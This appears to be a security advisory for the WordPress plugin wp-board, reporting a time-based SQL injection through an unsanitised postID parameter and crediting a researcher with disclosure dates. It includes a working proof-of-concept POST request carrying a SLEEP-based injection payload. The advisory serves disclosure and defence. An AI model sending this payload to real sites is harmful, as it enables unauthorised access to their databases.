The options.php file of the plugin accepts a postid parameter which is not sanitised, escaped or validated before inserting to a SQL statement, leading to SQL injection. This is a time based SQLI and in the same function vulnerable parameter is passed twice so if we pass time as 5 seconds it takes 10 seconds to return since the query ran twice.
POST /wp-content/plugins/wp-board/php/actions.php?action=modp&postID=0%20AND%20(SELECT%201067%20FROM (SELECT(SLEEP(5)))PVan) HTTP/1.1 Content-Length: 19 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Sec-GPC: 1 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close newtext=sad&imp=off
Syed Sheeraz Ali of Codevigilant
Yes
2021-08-22 (about 9 months ago)
2021-08-23 (about 9 months ago)
2022-03-07 (about 2 months ago)